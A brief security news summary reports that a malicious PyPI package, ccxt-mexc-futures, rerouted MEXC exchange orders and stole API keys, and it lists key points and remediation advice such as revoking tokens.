Summary: Cybersecurity researchers have discovered a malicious package on PyPI named ccxt-mexc-futures that reroutes trading orders on the MEXC cryptocurrency exchange to a malicious server, compromising users’ sensitive information and tokens. The package has been removed from the repository but had over 1,000 downloads, and developers are advised to revoke compromised tokens. This incident highlights broader concerns around the security of open-source packages and the threat of malicious dependencies in software supply chains.
Affected: MEXC cryptocurrency exchange, Python Package Index (PyPI)
Keypoints :
- Malicious package ccxt-mexc-futures was designed to redirect trading orders and steal tokens.
- The package spoofed an extension of the legitimate ccxt library and had been downloaded over 1,065 times before removal.
- It specifically altered MEXC-related functions to capture sensitive API keys, sending them to an attacker-controlled domain.
- Users are urged to revoke compromised tokens and delete the package immediately to mitigate potential risks.
- This incident reflects a growing threat of malicious packages infiltrating open-source repositories.
Source: https://thehackernews.com/2025/04/malicious-pypi-package-targets-mexc.html